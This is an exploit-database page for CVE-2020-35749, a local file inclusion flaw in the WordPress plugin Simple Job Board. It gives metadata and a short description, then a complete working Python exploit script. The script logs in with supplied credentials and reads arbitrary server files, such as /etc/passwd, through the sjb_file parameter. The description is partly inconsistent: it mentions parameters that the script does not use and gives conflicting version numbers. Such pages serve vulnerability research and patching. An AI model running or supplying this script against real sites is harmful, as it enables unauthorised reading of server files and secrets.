header-logo
Suggest Exploit
vendor:
Simple Job Board
by:
Ven3xy
7.7
CVSS
HIGH
Local File Inclusion
22
CWE
Product Name: Simple Job Board
Affected Version From: 2.9.2003
Affected Version To: 2.9.2003
Patch Exists: YES
Related CWE: CVE-2020-35749
CPE: a:wordpress:simple_job_board
Metasploit:
Other Scripts:
Tags: authenticated,packetstorm,wp,cve2020,lfi,wordpress,wp-plugin,wpscan,cve
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
Nuclei References: https://wpscan.com/vulnerability/eed3bd69-2faf-4bc9-915c-c36211ef9e2dhttps://nvd.nist.gov/vuln/detail/CVE-2020-35749https://docs.google.com/document/d/1TbePkrRGsczepBaJptIdVRvfRrjiC5hjGg_Vxdesw6E/edit?usp=sharinghttp://packetstormsecurity.com/files/161050/Simple-JobBoard-Authenticated-File-Read.html
Nuclei Metadata: {'max-request': 2, 'framework': 'wordpress', 'vendor': 'presstigers', 'product': 'simple_board_job'}
Platforms Tested: Ubuntu 20.04 LTS
2022

WordPress Plugin Simple Job Board 2.9.3 – Local File Inclusion

WordPress Plugin Simple Job Board 2.9.3 is vulnerable to a local file inclusion vulnerability. An attacker can exploit this vulnerability to gain access to sensitive files on the server. The vulnerability exists due to the lack of proper input validation in the 'action' and 'method' parameters of the 'sjb_ajax_action' AJAX action. An attacker can exploit this vulnerability by sending a specially crafted HTTP request with the malicious 'file_path' parameter. This will allow the attacker to read any file on the server.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update to the latest version of the plugin.
Source

Exploit-DB raw data:

# Exploit Title: Wordpress Plugin Simple Job Board 2.9.3 - Local File Inclusion
# Date: 2022-02-06
# Exploit Author: Ven3xy
# Vendor Homepage: https://wordpress.org/plugins/simple-job-board/
# Software Link: https://downloads.wordpress.org/plugin/simple-job-board.2.9.3.zip
# Version: 2.9.3
# Tested on: Ubuntu 20.04 LTS
# CVE : CVE-2020-35749


import requests
import sys
import time

class color:
    HEADER = '\033[95m'
    IMPORTANT = '\33[35m'
    NOTICE = '\033[33m'
    OKBLUE = '\033[94m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    RED = '\033[91m'
    END = '\033[0m'
    UNDERLINE = '\033[4m'
    LOGGING = '\33[34m'
color_random=[color.HEADER,color.IMPORTANT,color.NOTICE,color.OKBLUE,color.OKGREEN,color.WARNING,color.RED,color.END,color.UNDERLINE,color.LOGGING]    
    

def banner():
    run = color_random[6]+'''\nY88b         /                888~~                     888          ,e,   d8   
 Y88b       /  888-~88e       888___ Y88b  /  888-~88e  888  e88~-_   "  _d88__ 
  Y88b  e  /   888  888b ____ 888     Y88b/   888  888b 888 d888   i 888  888   
   Y88bd8b/    888  8888      888      Y88b   888  8888 888 8888   | 888  888   
    Y88Y8Y     888  888P      888      /Y88b  888  888P 888 Y888   ' 888  888   
     Y  Y      888-_88"       888___  /  Y88b 888-_88"  888  "88_-~  888  "88_/ 
               888                                888                              \n'''
    run2 = color_random[2]+'''\t\t\t(CVE-2020-35749)\n'''           
    run3 = color_random[4]+'''\t{ Coded By: Ven3xy  | Github: https://github.com/M4xSec/ }\n\n'''
    print(run+run2+run3)           
               
    

if (len(sys.argv) != 5):
    banner()
    print("[!] Usage   : ./wp-exploit.py <target_url> <file_path> <USER> <PASS>")
    print("[~] Example : ./wp-exploit.py http://target.com:8080/wordpress/ /etc/passwd admin admin")
    exit()

else:
    banner()
    fetch_path = sys.argv[2]
    print (color_random[5]+"[+] Trying to fetch the contents from "+fetch_path)
    time.sleep(3)
    target_url = sys.argv[1]
    usernamex = sys.argv[3]
    passwordx = sys.argv[4]
    print("\n")
    login = target_url+"wp-login.php"
    wp_path = target_url+'wp-admin/post.php?post=application_id&action=edit&sjb_file='+fetch_path
    username = usernamex
    password = passwordx

    with requests.Session() as s:
        headers = { 'Cookie':'wordpress_test_cookie=WP Cookie check',
                 'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15' }

        post_data={ 'log':username, 'pwd':password, 
                   'wp-submit':'Log In','redirect_to':wp_path, 
                   'testcookie':'1'
                       }  
         
        s.post(login, headers=headers, data=post_data)
        resp = s.get(wp_path)
    
        out_file = open("output.txt", "w")
        print(resp.text, file=out_file)
        out_file.close()
        print(color_random[4]+resp.text)
        out = color_random[5]+"\n[+] Output Saved as: output.txt\n"
        print(out)

Navigation

Suggest Exploit

Services By CQR